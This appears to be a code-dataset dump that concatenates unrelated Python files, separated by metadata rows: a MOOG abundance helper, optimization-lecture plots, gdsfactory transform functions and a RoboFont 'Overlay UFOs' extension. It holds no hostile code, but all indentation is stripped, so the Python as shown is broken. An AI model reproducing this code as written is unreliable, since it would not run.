#files are overwritten with each itereation of the routine, only minimal output data are needed.
#
#The user can choose to have the parameter file written to screen by choosing verbose=True
#The user can choose to have more detailed MOOG output by chooseing the appropriate values for the
#MOOG input parameters.
import numpy as np
def param_file(linelist,atmosphere=0,molecules=1,lines=0,flux=0,damp=0,plot=0,units=0,verbose=False):
if verbose:
print('abfind')
print('terminal \'x11\'')
print('standard_out \'moog_out.1\'')
print('summary_out \'moog_out.2\'')
print('model_in \'star.mod\'')
print('lines_in \'' + linelist + '\'')
print('atmosphere ' + str(atmosphere))
print('molecules ' + str(molecules))
print('lines ' + str(lines))
print('flux/int ' + str(flux))
print('damping ' + str(damp))
print('plot ' + str(plot))
print('units ' + str(units))
with open('batch.par', 'wt') as file:
file.write('abfind' + '\n')
file.write('terminal \'x11\'' + '\n')
file.write('standard_out \'moog_out.1\'' + '\n')
file.write('summary_out \'moog_out.2\'' + '\n')
file.write('model_in \'star.mod\'' + '\n')
file.write('lines_in \'' + linelist + '\'' + '\n')
file.write('atmosphere ' + str(atmosphere) + '\n')
file.write('molecules ' + str(molecules) + '\n')
file.write('lines ' + str(lines) + '\n')
file.write('flux/int ' + str(flux) + '\n')
file.write('damping ' + str(damp) + '\n')
file.write('plot ' + str(plot) + '\n')
file.write('units ' + str(units) + '\n')
#Function for creating the solar and stellar linelists
def linelist_create(star_in, sun_in, direc_path):
with open(direc_path + '/linelist_star.txt', 'w') as out_star:
with open(direc_path + '/linelist_sun.txt', 'w') as out_sun:
with open(star_in) as file_star:
with open(sun_in) as file_sun:
line_star = file_star.readline()
out_star.write(line_star) #accounts for comment line in linelist files
line_sun = file_sun.readline()
out_sun.write(line_sun) #accounts for comment line in linelist files
line = file_star.readlines()
line_s = file_sun.readlines()
for line_star in line:
line_star_split = line_star.split()
#if len(line_star_split) < 2: continue
for line_sun in line_s:
line_sun_split = line_sun.split()
#if len(line_sun_split) < 2: continue
if line_star_split[0] == line_sun_split[0] and line_star_split[1] == line_sun_split[1]:
out_star.write(line_star)
out_sun.write(line_sun)
continue
#Reads Moog output files, parsing elements and colums
def read_file(filename):
count = 0
elements = ['Fe I ', 'Fe II ', 'C I ', 'N I ', 'O I ', 'S I', 'K I ', 'Na I ', 'Mg I ', 'Al I ', 'Si I ', 'Ca I ', 'Sc II ', 'Ti I ', 'Ti II ', 'V ', 'Cr I ',
'Mn I ', 'Co I ', 'Ni I ', 'Cu I ', 'Zn I ', 'Ba II ']
dtype = [('wavelength', 'f8'),
('ID', 'f8'),
('EP', 'f8'),
('logGF', 'f8'),
('EWin', 'f8'),
('logRWin', 'f8'),
('abund', 'f8'),
('delavg', 'f8')]
abundances = []
el_found = []
with open(filename) as file:
while True:
count += 1
# Get next line from file
line = file.readline()
# if line is empty end of file is reached
if not line: break
for j, el in enumerate(elements):
species = 'Abundance Results for Species ' + el
if species in line:
new_arr = []
el_found.append(el)
line = file.readline().split()
line = file.readline().split()
while len(line) == 8:
new_arr.append(line)
line = file.readline().rstrip().split()
new_arr = np.array(new_arr)
new_arr = np.core.records.fromarrays(new_arr.T,dtype=dtype)
abundances.append(new_arr)
return el_found, abundances
| 41.45082 | 168 | 0.489816 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,760 | 0.348032 |
c7ba2b5a0bc557fae2df973eed4ab42b40580f6e | 1,862 | py | Python | lectures/optimization/optimization_plots.py | carolinalvarez/ose-course-scientific-computing | 4b816fa81320c88fc5f35b203f0541e0a1a00939 | [
"MIT"
]
| null | null | null | lectures/optimization/optimization_plots.py | carolinalvarez/ose-course-scientific-computing | 4b816fa81320c88fc5f35b203f0541e0a1a00939 | [
"MIT"
]
| null | null | null | lectures/optimization/optimization_plots.py | carolinalvarez/ose-course-scientific-computing | 4b816fa81320c88fc5f35b203f0541e0a1a00939 | [
"MIT"
]
| null | null | null | """Plots for optimization lecture."""
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import cm
def plot_contour(f, allvecs, legend_path):
"""Plot contour graph for function f."""
# Create array from values with at least two dimensions.
allvecs = np.atleast_2d(allvecs)
X, Y, Z = _get_grid(f)
CS = plt.contour(X, Y, Z)
plt.clabel(CS, inline=1, fontsize=10)
plt.title("objective function")
plt.xlabel("variable $x_1$")
plt.ylabel("variable $x_2$")
plt.rc("text", usetex=False)
plt.rc("font", family="serif")
plt.plot(1, 1, "r*", markersize=10, label="minimum")
plt.plot(4.5, -1.5, "bx", markersize=10, label="initial guess")
plt.plot(
np.array(allvecs)[:, 0], np.array(allvecs)[:, 1], "go", markersize=4, label=legend_path,
)
plt.legend()
return plt
def _get_grid(f):
"""Create a grid for function f."""
# create data to visualize objective function
n = 50 # number of discretization points along the x-axis
m = 50 # number of discretization points along the x-axis
a = -2.0
b = 5.0 # extreme points in the x-axis
c = -2
d = 5.0 # extreme points in the y-axis
X, Y = np.meshgrid(np.linspace(a, b, n), np.linspace(c, d, m))
Z = np.zeros(X.shape)
argument = np.zeros(2)
for i in range(X.shape[0]):
for j in range(X.shape[1]):
argument[0] = X[i, j]
argument[1] = Y[i, j]
Z[i][j] = f(argument)
return X, Y, Z
def plot_surf(f):
"""Plot surface graph of function f."""
X, Y, Z = _get_grid(f)
fig = plt.figure()
ax = fig.gca(projection="3d")
# Plot the surface.
surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm)
plt.xlabel("variable $x_1$")
plt.ylabel("variable $x_2$")
fig.colorbar(surf)
plt.title("objective function")
| 27.791045 | 96 | 0.605263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 594 | 0.319012 |
c7ba60efd06c8906b83387592b8347e6da526db9 | 7,141 | py | Python | gdsfactory/functions.py | simbilod/gdsfactory | 4d76db32674c3edb4d16260e3177ee29ef9ce11d | [
"MIT"
]
| null | null | null | gdsfactory/functions.py | simbilod/gdsfactory | 4d76db32674c3edb4d16260e3177ee29ef9ce11d | [
"MIT"
]
| null | null | null | gdsfactory/functions.py | simbilod/gdsfactory | 4d76db32674c3edb4d16260e3177ee29ef9ce11d | [
"MIT"
]
| null | null | null | """All functions return a Component so you can easily pipe or compose them.
There are two types of functions:
- decorators: return the original component
- containers: return a new component
"""
from functools import lru_cache, partial
import numpy as np
from omegaconf import OmegaConf
from pydantic import validate_arguments
from gdsfactory.cell import cell
from gdsfactory.component import Component
from gdsfactory.components.text_rectangular import text_rectangular_multi_layer
from gdsfactory.port import auto_rename_ports
from gdsfactory.types import (
Anchor,
Axis,
ComponentSpec,
Float2,
Layer,
List,
Optional,
Strs,
)
cache = lru_cache(maxsize=None)
def add_port(component: Component, **kwargs) -> Component:
"""Return Component with a new port."""
component.add_port(**kwargs)
return component
@cell
def add_text(
component: ComponentSpec,
text: str = "",
text_offset: Float2 = (0, 0),
text_anchor: Anchor = "cc",
text_factory: ComponentSpec = text_rectangular_multi_layer,
) -> Component:
"""Return component inside a new component with text geometry.
Args:
component: component spec.
text: text string.
text_offset: relative to component anchor. Defaults to center (cc).
text_anchor: relative to component (ce cw nc ne nw sc se sw center cc).
text_factory: function to add text labels.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
t = component_new << text_factory(text)
t.move((np.array(text_offset) + getattr(ref.size_info, text_anchor)))
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
def add_texts(
components: List[ComponentSpec],
prefix: str = "",
index0: int = 0,
**kwargs,
) -> List[Component]:
"""Return a list of Component with text labels.
Args:
components: list of component specs.
prefix: Optional prefix for the labels.
index0: defaults to 0 (0, for first component, 1 for second ...).
keyword Args:
text_offset: relative to component size info anchor. Defaults to center.
text_anchor: relative to component (ce cw nc ne nw sc se sw center cc).
text_factory: function to add text labels.
"""
return [
add_text(component, text=f"{prefix}{i+index0}", **kwargs)
for i, component in enumerate(components)
]
@cell
def rotate(
component: ComponentSpec, angle: float = 90, recenter: bool = False
) -> Component:
"""Return rotated component inside a new component.
Most times you just need to place a reference and rotate it.
This rotate function just encapsulates the rotated reference into a new component.
Args:
component: spec.
angle: to rotate in degrees.
recenter: recenter component after rotating.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
origin_offset = ref.origin - np.array((ref.xmin, ref.ymin))
ref.rotate(angle)
if recenter:
ref.move(
origin=ref.center,
destination=np.array((ref.xsize / 2, ref.ysize / 2)) - origin_offset,
)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
rotate90 = partial(rotate, angle=90)
rotate90n = partial(rotate, angle=-90)
rotate180 = partial(rotate, angle=180)
@cell
def mirror(
component: ComponentSpec, p1: Float2 = (0, 1), p2: Float2 = (0, 0)
) -> Component:
"""Return new Component with a mirrored reference.
Args:
component: component spec.
p1: first point to define mirror axis.
p2: second point to define mirror axis.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
ref.mirror(p1=p1, p2=p2)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
@cell
def move(
component: Component,
origin=(0, 0),
destination=None,
axis: Optional[Axis] = None,
) -> Component:
"""Return new Component with a moved reference to the original component.
Args:
component: to move.
origin: of component.
destination: Optional x, y.
axis: x or y axis.
"""
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
ref.move(origin=origin, destination=destination, axis=axis)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
def move_port_to_zero(component: Component, port_name: str = "o1"):
"""Return a container that contains a reference to the original component.
The new component has port_name in (0, 0).
"""
if port_name not in component.ports:
raise ValueError(
f"port_name = {port_name!r} not in {list(component.ports.keys())}"
)
return move(component, -component.ports[port_name].midpoint)
def update_info(component: Component, **kwargs) -> Component:
"""Return Component with updated info."""
component.info.update(**kwargs)
return component
@validate_arguments
def add_settings_label(
component: Component, layer_label: Layer = (66, 0), settings: Optional[Strs] = None
) -> Component:
"""Add a settings label to a component.
Args:
component: spec.
layer_label: for label.
settings: tuple or list of settings. if None, adds all changed settings.
"""
d = (
{setting: component.get_setting(setting) for setting in settings}
if settings
else component.metadata.changed
)
component.add_label(text=OmegaConf.to_yaml(d), layer=layer_label)
return component
__all__ = (
"add_port",
"add_text",
"add_settings_label",
"auto_rename_ports",
"cache",
"mirror",
"move",
"move_port_to_zero",
"rotate",
"update_info",
)
if __name__ == "__main__":
import gdsfactory as gf
c = gf.components.mmi1x2(
length_mmi=10,
decorator=partial(add_settings_label, settings=["name", "length_mmi"]),
)
# c.show()
cr = rotate(component=c)
cr.show()
# cr = c.rotate()
# cr.pprint()
# cr.show()
# cm = move(c, destination=(20, 20))
# cm.show()
# cm = mirror(c)
# cm.show()
# cm = c.mirror()
# cm.show()
# cm2 = move_port_to_zero(cm)
# cm2.show()
# cm3 = add_text(c, "hi")
# cm3.show()
# cr = rotate(component=c)
# cr.show()
# print(component_rotated)
# component_rotated.pprint
# component_netlist = component.get_netlist()
# component.pprint_netlist()
| 25.967273 | 87 | 0.669654 | 0 | 0 | 0 | 0 | 3,884 | 0.543901 | 0 | 0 | 2,808 | 0.393222 |
c7ba7f82e01986b93c50e54b040c99061ee59d08 | 26,640 | py | Python | OverlayUFOs/Overlay UFOs.roboFontExt/lib/OverlayUFOs.py | connordavenport/fbOpenTools | 794c71d504cea1248c256bea11d5249b0a4144a1 | [
"Unlicense"
]
| null | null | null | OverlayUFOs/Overlay UFOs.roboFontExt/lib/OverlayUFOs.py | connordavenport/fbOpenTools | 794c71d504cea1248c256bea11d5249b0a4144a1 | [
"Unlicense"
]
| null | null | null | OverlayUFOs/Overlay UFOs.roboFontExt/lib/OverlayUFOs.py | connordavenport/fbOpenTools | 794c71d504cea1248c256bea11d5249b0a4144a1 | [
"Unlicense"
]
| null | null | null | #coding=utf-8
from __future__ import division
"""
# OVERLAY UFOS
For anyone looking in here, sorry the code is so messy. This is a standalone version of a script with a lot of dependencies.
"""
import os
from AppKit import * #@PydevCodeAnalysisIgnore
from vanilla import * #@PydevCodeAnalysisIgnore
from mojo.drawingTools import *
from mojo.events import addObserver, removeObserver
from mojo.extensions import getExtensionDefault, setExtensionDefault, getExtensionDefaultColor, setExtensionDefaultColor
from mojo.UI import UpdateCurrentGlyphView
from fontTools.pens.transformPen import TransformPen
from defconAppKit.windows.baseWindow import BaseWindowController
import unicodedata
#from lib.tools.defaults import getDefaultColor
from lib.tools.drawing import strokePixelPath
from lib.UI.spaceCenter.glyphSequenceEditText import splitText
from builtins import chr
selectedSymbol = u'•'
def SmallTextListCell(editable=False):
cell = NSTextFieldCell.alloc().init()
size = NSSmallControlSize #NSMiniControlSize
cell.setControlSize_(size)
font = NSFont.systemFontOfSize_(NSFont.systemFontSizeForControlSize_(size))
cell.setFont_(font)
cell.setEditable_(editable)
return cell
class TX:
"""
An agnostic way to get a naked font.
"""
@classmethod
def naked(cls, f):
try:
return f.naked()
except:
return f
class Tool():
"""
The tool object manages the font list. This is a simplification.
"""
fonts = AllFonts()
def addObserver(self, target, method, action):
addObserver(target, method, action)
def removeObserver(self, target, method, action):
removeObserver(target, method, action)
def getCurrentFont(self):
return CurrentFont()
def getFonts(self):
u"""Answers the list of selected fonts, ordered by their path.
"""
return self.fonts
def appendToFonts(self, path):
f = OpenFont(path, showUI=False)
self.fonts.append(f)
def removeFromFonts(self, path):
for i, f in enumerate(self.fonts):
if f.path == path:
del self.fonts[i]
def getFontPaths(self):
return [f.path or str(f.info.familyName)+" "+str(f.info.styleName) for f in self.getFonts()]
def getFontLabel(self, path):
if path is None:
return None
if not path:
return 'Untitled'
name = path.split('/')[-1]
status = selectedSymbol
return status, path, name
def getFontLabels(self):
labels = {}
for path in self.getFontPaths():
if path:
label = self.getFontLabel(path)
name = label[-1]
else:
name = 'Untitled'
if not name in labels:
labels[name] = []
labels[name].append(label)
sortedLabels = []
for _, labelSet in sorted(labels.items()):
if len(labelSet) == 1: # There is only a single font with this name
sortedLabels.append(labelSet[0])
else: # Otherwise we'll have to construct new names to show the difference
for status, path, name in sorted(labelSet):
sortedLabels.append((status, path, '%s "%s"' % (name, '/'.join(path.split('/')[:-1]))))
return sortedLabels
class C:
"""
Some constants.
"""
C2 = 100
BUTTON_WIDTH = 80
STYLE_CHECKBOXSIZE = 'small'
STYLE_LABELSIZE = 'small'
STYLE_RADIOSIZE = 'small'
L = 22
LL = 25
class OverlayUFOs(BaseWindowController):
DEFAULTKEY = "com.fontbureau.overlayUFO"
DEFAULTKEY_FILLCOLOR = "%s.fillColor" %DEFAULTKEY
DEFAULTKEY_STROKECOLOR = "%s.strokeColor" %DEFAULTKEY
DEFAULTKEY_STROKE = "%s.stroke" %DEFAULTKEY
DEFAULTKEY_FILL = "%s.fill" %DEFAULTKEY
FALLBACK_FILLCOLOR = NSColor.colorWithCalibratedRed_green_blue_alpha_(.5, 0, .5, .1)
FALLBACK_STROKECOLOR = NSColor.colorWithCalibratedRed_green_blue_alpha_(.5, 0, .5, .5)
VERSION = 1.0
NAME = u'Overlay UFOs'
MANUAL = u"""In the current glyph window, this will present the view the same glyph from a separate
UFO or set of UFOs.<br/>
This does NOT import the UFO into a background layer. Instead, it renders a outline directly from the UFO into the glyph window view.
<ul>
<li>There is no need to import duplicate data into a background layer.</li>
<li>The source outline is always live; when changes are made to the source, they will automatically
appear in the current without re-importing.</li>
<li>The source font does not need to be opened with a UI.</li>
</ul>
<h3>DIALOG</h3>
<ul>
<li>A floating dialog is present to let you open and select source fonts, fill, stroke, color.</li>
<li>Source Fonts: The default source font list is self.getOpenFonts(). The refresh button will
return this list to self.getOpenFonts().</li>
<li>Adding Fonts: You can manually add fonts by selecting a UFO file.
The UFO file will open without an interface.</li>
<li>Removing Fonts: There are buttons for removing selected fonts and for clearing the source font list.</li>
</ul>
<h3>BUGS/IMPROVEMENTS</h3>
<ul>
<li>Known Issue: The source font is drawn on top of the current font, instead of behind it.
So, it is good to select a color with a low opacity.</li>
<li>Known Bug: If the glyph window for both source and current fonts are open, it is possible
to select and inadvertently edit the source outline in the current window. I don't know how to solve this.</li>
<li>Improvement?: Add options to scale the source font.</li>
<li>Improvement?: Set different colors, fill settings for each font?</li>
</ul>
"""
# Fixed width of the window.
VIEWMINSIZE = 400
VIEWSIZE = VIEWMINSIZE
VIEWMAXSIZE = VIEWMINSIZE
WINDOW_POSSIZE = (130, 20, VIEWSIZE, 260)
WINDOW_MINSIZE = (VIEWMINSIZE, 260)
WINDOW_MAXSIZE = (VIEWMAXSIZE, 260)
def getPathListDescriptor(self):
return [
dict(title='Status', key='status', cell=SmallTextListCell(editable=False), width=12, editable=False),
dict(title='Name', key='name', width=300, cell=SmallTextListCell(editable=False), editable=False),
dict(title='Path', key='path', width=0, editable=False),
]
################
# OBSERVERS AND UPDATERS
################
def fontSelectionChanged(self):
self.setSourceFonts()
def activateModule(self):
self.tool.addObserver(self, 'drawInactive', 'drawInactive')
self.tool.addObserver(self, 'drawBackground', 'drawBackground')
self.tool.addObserver(self, 'fontDidOpen', 'fontDidOpen')
self.tool.addObserver(self, 'fontWillClose', 'fontWillClose')
def deactivateModule(self):
removeObserver(self, 'drawBackground')
removeObserver(self, 'drawInactive')
removeObserver(self, 'fontDidOpen')
removeObserver(self, 'fontWillClose')
################
# CONTEXTS
################
def fontDidOpen(self, info):
font = info.get('font')
if font:
self.tool.fonts.append(font)
self.refreshCallback()
def fontWillClose(self, info):
font = info.get('font')
path = font.path
if path:
self.tool.removeFromFonts(path)
self.refreshCallback()
def __init__(self):
self.tool = Tool()
self.w = FloatingWindow((400, 200), "Overlay UFOs", minSize=(400, 200))
self.populateView()
self.getView().open()
def getView(self):
return self.w
def refreshCallback(self, sender=None):
"""
Update the font list.
"""
self.getView().fontList.set(self.getFontItems())
def resetCallback(self, sender=None):
"""
Resets the view to the currently opened fonts.
"""
self.tool.fonts = AllFonts()
self.getView().fontList.set(self.getFontItems())
def addCallback(self, sender=None):
"""
Open a font without UI and add it to the font list.
"""
f = OpenFont(None, showUI=False)
if f is None:
return
self.tool.appendToFonts(f.path)
self.refreshCallback()
def populateView(self):
"""
The UI
"""
self.fillColor = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
self.strokeColor = getExtensionDefaultColor(self.DEFAULTKEY_STROKECOLOR, self.FALLBACK_STROKECOLOR)
self.contextBefore = self.contextAfter = ''
# Populating the view can only happen after the view is attached to the window,
# or else the relative widths go wrong.
view = self.getView()
view.add = Button((-40, 3, 30, 22), '+', callback=self.addCallback)
view.reset = Button((-40, 30, 30, 22), chr(8634), callback=self.resetCallback)
# Flag to see if the selection list click is in progress. We are resetting the selection
# ourselves, using the list "buttons", but changing that selection will cause another
# list update, that should be ignored.
self._selectionChanging = False
# Indicate that we are a drawing module
self._canDraw = True
self.sources = []
x = y = 4
view.fontList = List((C.C2, y, 250, -65), self.getFontItems(),
selectionCallback=self.fontListCallback,
drawFocusRing=False,
enableDelete=False,
allowsMultipleSelection=False,
allowsEmptySelection=True,
drawHorizontalLines=True,
showColumnTitles=False,
columnDescriptions=self.getPathListDescriptor(),
rowHeight=16,
)
view.viewEnabled = CheckBox((x, y, C.BUTTON_WIDTH, 22), "Show",
callback=self.viewCallback, sizeStyle=C.STYLE_CHECKBOXSIZE,
value=True)
y += C.L
view.fill = CheckBox((x, y, 60, 22), "Fill", sizeStyle=C.STYLE_CHECKBOXSIZE,
#value=getExtensionDefault("%s.%s" %(self.DEFAULTKEY, "fill"), True),
value = True,
callback=self.fillCallback)
y += C.L
color = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
view.color = ColorWell((x, y, 60, 22),
color=color,
callback=self.colorCallback)
y += C.L + 5
view.stroke = CheckBox((x, y, 60, 22), "Stroke", sizeStyle=C.STYLE_CHECKBOXSIZE,
#value=getExtensionDefault("%s.%s" %(self.DEFAULTKEY, "stroke"), False),
value = False,
callback=self.strokeCallback)
y += C.LL
view.alignText = TextBox((x, y, 90, 50), 'Alignment', sizeStyle=C.STYLE_LABELSIZE)
y += C.L
view.align = RadioGroup((x, y, 90, 50), ['Left', 'Center', 'Right'], isVertical=True,
sizeStyle=C.STYLE_RADIOSIZE, callback=self.alignCallback)
view.align.set(0)
#view.contextLabel = TextBox((C.C2, -58, 90, 50), 'Contexts', sizeStyle=C.STYLE_LABELSIZE)
view.viewCurrent = CheckBox((C.C2, -60, 150, 22), "Always View Current", sizeStyle=C.STYLE_CHECKBOXSIZE,
value = False,
callback=self.contextEditCallback)
#view.contextUandlc = CheckBox((C.C2+170, -60, 85, 22), "Match Case", sizeStyle=C.STYLE_CHECKBOXSIZE,
# value = False,
# callback=self.contextEditCallback)
view.contextBefore = EditText((C.C2, -30, 85, 20), callback=self.contextEditCallback, continuous=True, sizeStyle="small", placeholder='Left Context')
view.contextCurrent = EditText((C.C2+95, -30, 60, 20), callback=self.contextCurrentEditCallback, continuous=True, sizeStyle="small")
view.contextAfter = EditText((C.C2+165, -30, 85, 20), callback=self.contextEditCallback, continuous=True, sizeStyle="small", placeholder='Right Context')
self.activateModule()
self.setUpBaseWindowBehavior()
def fontListCallback(self, sender):
u"""If there is a selection, toggle the status of these fonts."""
# Avoid recursive loop because of changing font selection
if not self._selectionChanging:
for selectedIndex in sender.getSelection():
item = sender.get()[selectedIndex]
if item['status']:
item['status'] = ''
else:
item['status'] = selectedSymbol
# If shift is held when pressing an entry in the font list,
# the non-selected fonts will swap with the current's state
if NSEvent.modifierFlags() & NSShiftKeyMask:
items = [sender.get()[i] for i in range(len(sender.get())) if i != selectedIndex]
for subItems in items:
if item['status'] == '':
subItems['status'] = selectedSymbol
else:
subItems['status'] = ''
self._selectionChanging = True
# Avoid recursive loop because of changing font selection
sender.setSelection([])
self._selectionChanging = False
self.updateView()
def canDraw(self):
return True
"""
There is an experimental feature that will change the case of the context characters based on the case of the current glyph. But I'm disabling that for now.
"""
#def isUpper(self, g):
# char = CharacterTX.glyph2Char(g)
# if len(char) > 1:
# char = char[0]
# if unicodedata.category(char) == 'Lu':
# return True
# return False
#def isLower(self, g):
# char = CharacterTX.glyph2Char(g)
# if len(char) > 1:
# char = char[0]
# if unicodedata.category(char) == 'Ll':
# return True
# return False
def getHiddenFont(self, path):
from builtins import str
for f in self.tool.getFonts():
if f.path == path:
return f
elif path == str(f.info.familyName)+" "+str(f.info.styleName):
return f
def drawBackground(self, info):
u"""Draw the background of defined glyphs and fonbts.
Scale is available as mouse.scale."""
view = self.getView()
if not view.viewEnabled.get():
return
fill = getExtensionDefault(self.DEFAULTKEY_FILL, True)
stroke = getExtensionDefault(self.DEFAULTKEY_STROKE, True)
fillcolor = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
glyph = info.get('glyph')
if glyph is not None:
current = glyph.getParent()
else:
current = self.tool.getCurrentFont()
if glyph is None or current is None:
return
align = self.getAlignment()
# Get the fonts from the list and see if they are selected.
sourceItems = self.getSourceFonts()
showFonts = []
for item in sourceItems:
if not item['status']:
continue
path = item['path']
font = self.getHiddenFont(path)
showFonts.append(font)
if view.viewCurrent.get() and current not in showFonts:
showFonts.append(current)
for font in showFonts:
self.fillColor.setFill()
self.strokeColor.setStroke()
contextBefore, contextCurrent, contextAfter = self.getContexts()
if font is not None:
contextBefore = splitText(contextBefore, TX.naked(font).unicodeData, TX.naked(font).groups)
contextBefore = [font[gname] for gname in contextBefore if gname in font.keys()]
contextAfter = splitText(contextAfter, TX.naked(font).unicodeData, TX.naked(font).groups)
contextAfter = [font[gname] for gname in contextAfter if gname in font.keys()]
contextCurrent = splitText(contextCurrent, TX.naked(font).unicodeData, TX.naked(font).groups)
if len(contextCurrent) > 0:
contextCurrent = [font[gname] for gname in [contextCurrent[0]] if gname in font.keys()]
if len(contextCurrent) > 0:
sourceGlyph = contextCurrent[0]
else:
sourceGlyph = None
elif glyph.name in font.keys():
sourceGlyph = font[glyph.name]
else:
sourceGlyph = None
"""
#There is an experimental feature that will change the case of the context characters based on the case of the current glyph. But I'm disabling that for now.
if view.contextUandlc.get():
caseTransform = None
if self.isUpper(glyph):
caseTransform = FontTX.unicodes.getUpperFromLower
elif self.isLower(glyph):
caseTransform = FontTX.unicodes.getLowerFromUpper
if caseTransform:
for i, g in enumerate(contextBefore):
newG = caseTransform(g)
if newG is not None:
contextBefore[i] = newG
newG = caseTransform(sourceGlyph)
if newG is not None:
sourceGlyph = newG
if caseTransform:
for i, g in enumerate(contextAfter):
newG = caseTransform(g)
if newG is not None:
contextAfter[i] = newG
"""
scale(current.info.unitsPerEm/float(font.info.unitsPerEm))
widthOffset = 0
if sourceGlyph is not None:
if align == 'center':
destCenter = float(glyph.width/2) / current.info.unitsPerEm
sourceCenter = float(sourceGlyph.width/2) / font.info.unitsPerEm
widthOffset = (destCenter-sourceCenter) * font.info.unitsPerEm
elif align == 'right':
widthOffset = ( ( glyph.width / glyph.getParent().info.unitsPerEm ) - (sourceGlyph.width / sourceGlyph.getParent().info.unitsPerEm ) ) * font.info.unitsPerEm
translate(widthOffset, 0)
previousGlyph = sourceGlyph
contextBefore.reverse()
totalWidth = 0
for i, cbGlyph in enumerate(contextBefore):
kernValue = 0
if previousGlyph is not None and previousGlyph.getParent() == cbGlyph.getParent():
# Uncomment to activate kerning. Requires FontTX.
#kernValue += FontTX.kerning.getValue((previousGlyph.name, cbGlyph.name), font.kerning, font.groups)
kernValue += 0
translate(-cbGlyph.width-kernValue, 0)
totalWidth += cbGlyph.width + kernValue
drawGlyphPath = TX.naked(cbGlyph).getRepresentation("defconAppKit.NSBezierPath")
if view.fill.get():
drawGlyphPath.fill()
if view.stroke.get():
strokePixelPath(drawGlyphPath)
previousGlyph = cbGlyph
translate(totalWidth, 0)
totalWidth = 0
contextCurrentAndAfter = [sourceGlyph]+contextAfter
for i, cbGlyph in enumerate(contextCurrentAndAfter):
if cbGlyph is None:
cbGlyph = sourceGlyph
nextGlyph = None
if i + 1 < len(contextCurrentAndAfter):
nextGlyph = contextCurrentAndAfter[i+1]
if (i == 0 and cbGlyph == glyph) or sourceGlyph is None:
pass
else:
drawGlyphPath = TX.naked(cbGlyph).getRepresentation("defconAppKit.NSBezierPath")
if view.fill.get():
drawGlyphPath.fill()
if view.stroke.get():
strokePixelPath(drawGlyphPath)
kernValue = 0
if cbGlyph is not None and nextGlyph is not None and nextGlyph.getParent() == cbGlyph.getParent():
#kernValue = FontTX.kerning.getValue((cbGlyph.name, nextGlyph.name), font.kerning, font.groups)
# Uncomment to activate kerning. Requires FontTX.
kernValue = 0
width = 0
if cbGlyph is not None:
width = cbGlyph.width
translate(width+kernValue, 0)
totalWidth += width + kernValue
previousGlyph = cbGlyph
translate(-totalWidth, 0)
translate(-widthOffset, 0)
scale(font.info.unitsPerEm/float(current.info.unitsPerEm))
#restore()
drawInactive = drawBackground
def viewCallback(self, sender):
self.updateView()
def getSourceFonts(self):
"""
Get the fonts in the list.
"""
view = self.getView()
return view.fontList.get()
def setSourceFonts(self):
u"""
Set the font list from the current set of open fonts.
"""
view = self.getView()
labels = []
currentSelection = []
for d in self.getSourceFonts():
if d['status']:
currentSelection.append(d['path'])
for status, path, name in self.tool.getFontLabels():
if path in currentSelection:
status = selectedSymbol
else:
status = ''
labels.append(dict(status=status, path=path, name=name))
view.fontList.set(labels)
def colorCallback(self, sender):
"""
Change the color.
"""
selectedColor = sender.get()
r = selectedColor.redComponent()
g = selectedColor.greenComponent()
b = selectedColor.blueComponent()
a = 1
strokeColor = NSColor.colorWithCalibratedRed_green_blue_alpha_(r, g, b, a)
setExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, selectedColor)
setExtensionDefaultColor(self.DEFAULTKEY_STROKECOLOR, strokeColor)
self.fillColor = selectedColor
self.strokeColor = strokeColor
self.updateView()
def fillCallback(self, sender):
"""
Change the fill status.
"""
setExtensionDefault(self.DEFAULTKEY_FILL, sender.get())
self.updateView()
def strokeCallback(self, sender):
"""
Change the stroke status.
"""
setExtensionDefault(self.DEFAULTKEY_STROKE, sender.get())
self.updateView()
def alignCallback(self, sender):
"""
Change the alignment status.
"""
self.updateView()
def getAlignment(self):
"""
Get the alignment as a string.
"""
view = self.getView()
index = view.align.get()
if index == 0:
return 'left'
elif index == 1:
return 'center'
elif index == 2:
return 'right'
def updateView(self, sender=None):
UpdateCurrentGlyphView()
def windowCloseCallback(self, sender):
self.deactivateModule()
self.updateView()
BaseWindowController.windowCloseCallback(self, sender)
def getFontItems(self, update=False):
"""
Get all fonts in a way that can be set into a vanilla list.
"""
paths = set() # Set of all unique paths in the merges lists
itemsByName = {}
if update: # If update flag is set, then keep the existing selected fonts.
for item in self.getSourceFonts():
if item['status']:
itemsByName[item['name']] = item
currentStatuses = {}
if hasattr(self.getView(), 'fontList'):
for d in self.getSourceFonts():
currentStatuses[d['path']] = d['status']
for status, path, uniqueName in self.tool.getFontLabels():
if path in currentStatuses:
status = currentStatuses[path]
else:
status = selectedSymbol
if not uniqueName in itemsByName.keys():# If it is not already there, add this to the list
itemsByName[uniqueName] = dict(status=status, path=path, name=uniqueName)
fontList = []
for key, item in sorted(itemsByName.items()):
fontList.append(item)
return fontList
################
# CONTEXTS
################
def getContexts(self):
if not hasattr(self, 'contextBefore'):
self.contextBefore = ''
if not hasattr(self, 'contextAfter'):
self.contextAfter = ''
if not hasattr(self, 'contextCurrent'):
self.contextCurrent = None
return self.contextBefore, self.contextCurrent, self.contextAfter
def setContexts(self, contextBefore, contextCurrent, contextAfter):
self.contextBefore = contextBefore
self.contextCurrent = contextCurrent
self.contextAfter = contextAfter
def contextEditCallback(self, sender):
before = self.getView().contextBefore.get()
current = self.getView().contextCurrent.get() or None
after = self.getView().contextAfter.get()
